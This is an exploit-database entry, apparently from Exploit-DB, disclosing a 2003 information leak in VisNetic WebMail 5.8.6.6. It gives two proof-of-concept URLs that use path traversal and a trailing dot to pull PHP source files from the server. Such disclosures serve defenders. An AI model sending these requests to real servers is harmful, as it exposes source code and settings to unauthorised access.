EXPLOITS

VisNetic WebMail 5.8.6 .6 - Information Disclosure

Author: posidron
type: webapps
platform: php
port: 
date_added: 2003-06-23  
date_updated: 2012-11-19  
verified: 1  
codes: OSVDB-2195  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22826.txt  

source: https://www.securityfocus.com/bid/8018/info

VisNetic WebMail is prone to an information disclosure vulnerability. Reportedly, by appending a dot '.' character to the end of a URI request to WebMail, the source code of PHP files may be returned in the web browser.

http://webmailhost:32000/mail/admin/../include.html.
http://webmailhost:32000/mail/admin/../settings.html.